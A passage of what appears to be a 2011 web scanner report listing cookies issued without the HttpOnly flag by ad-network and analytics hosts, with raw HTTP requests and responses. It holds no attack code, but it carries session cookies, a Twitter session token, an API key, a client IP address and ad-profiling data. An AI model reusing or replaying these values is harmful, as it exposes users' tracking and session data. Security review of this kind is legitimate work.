Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid
...[SNIP]...
6.51. http://affiliate.kickapps.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.kickapps.com
Path:   /crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"274-1302227874000"
Last-Modified: Fri, 08 Apr 2011 01:57:54 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 274
Date: Sat, 09 Apr 2011 12:29:49 GMT
Set-Cookie: BIGipServerapp_server_pool=1756342464.42015.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-
...[SNIP]...
6.52. http://ak1.abmr.net/is/content.yieldmanager.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/content.yieldmanager.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/content.yieldmanager.com?U=/ak/q.gif&V=3-lx%2fQOmxQNG0eorn%2fu8LBhvJeo45BnPB%2fik23iGVe80aLZrxSviggiGQ1thVyWCGj7JoWTuGQqRQ%3d&I=EEEA60E55DC1402&D=content.yieldmanager.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Cache-Control: max-age=0
If-Modified-Since: Wed, 18 Oct 2006 18:25:22 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D732F82572E67A35BA5BF05696140341DF83DF41237D012794F25B5156411B0E-3991BE1D4764374636ED9D1B940FEA8D6229E8AE7445C18E6AE4FBD599FB6EE4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://content.yieldmanager.com/ak/q.gif?01AD=2-2-7320F771B78BB912BBA6B43FD09A375AF470E07BBA7F6263FC7DF97235E71B2C-50EA0A74EF7A786FBF142F634336342D871099348D54D03CEE7EFC7E33D7483D&01RI=EEEA60E55DC1402&01NA=
Expires: Mon, 11 Apr 2011 16:51:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:51:19 GMT
Connection: close
Set-Cookie: 01AI=2-2-F7FF007DF9666A4675E172271ED2877EA801245906FC6F74799C0E1365DEE428-3B5BB0512DF04136FE1D7AF68802888AFF3B2F2871905733FA86994B3CC4A79D; expires=Tue, 10-Apr-2012 16:51:19 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

6.53. http://ak1.abmr.net/is/tag.admeld.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/iframe/3/foxnews/300x250/politics-bottom&V=3-jUOVCZARsyxH+dHMws+VqMAEIhqWEkm6k05w0XlzIC91Jfeb+K8e+Q%3d%3d&I=90A4C54ACA8290D&D=admeld.com&01AD=1&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EA49BC622C57E43014F7FE6EF1355413FADB8358BB4C363A4AF6797B5374FC5E-F664F3AE4E6B6C96B2174BDC101997813BE6B909145967C31BB3ED42B9E6829B

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3xkFoRwzZdHZJY48tpCxWZPLpmZ45zClagwxC5r36lze5klo7zuqbUg&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Expires: Mon, 11 Apr 2011 16:21:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close
Set-Cookie: 01AI=2-2-D766EC567D77B70A389C7D071A0C270EA4C213784ABFB628475CCF489CEFE47B-252217F50ECC03FC6DFE8656A68CB869AB99A49B02FC80DFDCD099F29516FE2A; expires=Tue, 10-Apr-2012 16:21:18 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

6.54. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
6.55. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.worldnow.com
Path:   /dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif?dcsredirect=1&dcsdat=1302352164714&dcssip=www.wcax.com&dcsuri=/&dcsqry=C=18195&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20WCAX.com&WT.js=Yes&WT.jv=1.5&WT.bs=1079x1038&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.0&WT.sp=WCAX&WT.cg_n=Homepage&WT.sv=NJBUILD03&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=20d5f21d8a4972ac84d1302352164716.1302352164716&WT.co_f=20d5f21d8a4972ac84d1302352164716&containertype=category&pageclass=home&contentprovider=WCAX&hostheader=www.wcax.com HTTP/1.1
Host: analytics.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-3328264608.30144177::FAF6E9A1D54BCA249BA810E8C60D2A67

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 20:37:06 GMT
Accept-Ranges: bytes
ETag: "0525658244c61:308"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMzI4MjY0NjA4LjMwMTQ0MTc3OjpGQQABAAAAAQAAAC1RoE0tUaBNAQAAAAEAAAAtUaBNLVGgTQAAAAA-; path=/; expires=Tue, 06-Apr-2021 12:29:33 GMT
P3P: policyref="http://analytics.worldnow.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa OUR IND UNI COM NAV INT"
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cneonction: close

GIF89a.............!.......,...........D..;
6.56. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.worldnow.com
Path:   /dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif?&dcsdat=1302352164714&dcssip=www.wcax.com&dcsuri=/&dcsqry=C=18195&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20WCAX.com&WT.js=Yes&WT.jv=1.5&WT.bs=1079x1038&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.0&WT.sp=WCAX&WT.cg_n=Homepage&WT.sv=NJBUILD03&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=20d5f21d8a4972ac84d1302352164716.1302352164716&WT.co_f=20d5f21d8a4972ac84d1302352164716&containertype=category&pageclass=home&contentprovider=WCAX&hostheader=www.wcax.com HTTP/1.1
Host: analytics.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Cneonction: close
Date: Sat, 09 Apr 2011 12:29:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif?dcsredirect=1&dcsdat=1302352164714&dcssip=www.wcax.com&dcsuri=/&dcsqry=C=18195&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20WCAX.com&WT.js=Yes&WT.jv=1.5&WT.bs=1079x1038&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.0&WT.sp=WCAX&WT.cg_n=Homepage&WT.sv=NJBUILD03&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=20d5f21d8a4972ac84d1302352164716.1302352164716&WT.co_f=20d5f21d8a4972ac84d1302352164716&containertype=category&pageclass=home&contentprovider=WCAX&hostheader=www.wcax.com
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-3338584608.30144177::043044681D53023AD98EBC405F0E8E9E; expires=Tue, 06-Apr-2021 12:29:31 GMT; path=/dcsuhch2hzersfqyzf2de5tct_4d8l
P3P: policyref="http://analytics.worldnow.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa OUR IND UNI COM NAV INT"

6.57. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 11 Apr 2011 16:21:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=4&seniority=executive&industry=business_services&functional_area=information_technology&location=texas&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=b67e419b-0f67-49a8-9374-7947627c8dff;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDvMYL6FMax0vdsnRGwuisv9jRbgsAzbwmlWisxtfL18I2N4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57UeTh1BhcR7a9NXzJIXKwEOngHh2VamB2DMjR7kplxipHvcAWXzmjMHEnpfCFNipPpMXLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

6.58. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352251-30597-14967
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:51 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02792
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCBJPjovAToHaWQiJTdhYWFkN2QzZGMzMzVk%250ANGIwNGFjZjllZjhmZTA2YTQ5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e2f772c7bb1d7130fafe5220eaad1a5066753ead; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weeke
...[SNIP]...
6.59. http://ar.atwola.com/atd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cords=MToxMzAxNzg2ODI4OjcsMTMwMTc4NjgyOA==

Response

HTTP/1.1 302 Found
Date: Sat, 09 Apr 2011 12:33:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2
Expires: Sat, 09 Apr 2011 12:33:15 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzAyMzUyMzk1OjcsMTMwMjM1MjM5NQ==; domain=.ar.atwola.com; path=/; expires=Sun, 07 Aug 2011 12:33:15 GMT
Location: http://r.nexac.com/e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http://ar.atwola.com/atd?it=7%26iv=%3cna_di%3e%26ds%3d7%26ed%3d%3cna_da%3e%26rand=192365
Content-Length: 0
Content-Type: text/plain

6.60. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036361&rn=1225152024&c7=http%3A%2F%2Fwww.wcax.com%2F&c4=%2FGlobal%2Fcategory.asp%3FC%3D18195&c8=WCAX.COM%20Local%20Vermont%20News%2C%20Weather%20and%20Sports-%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
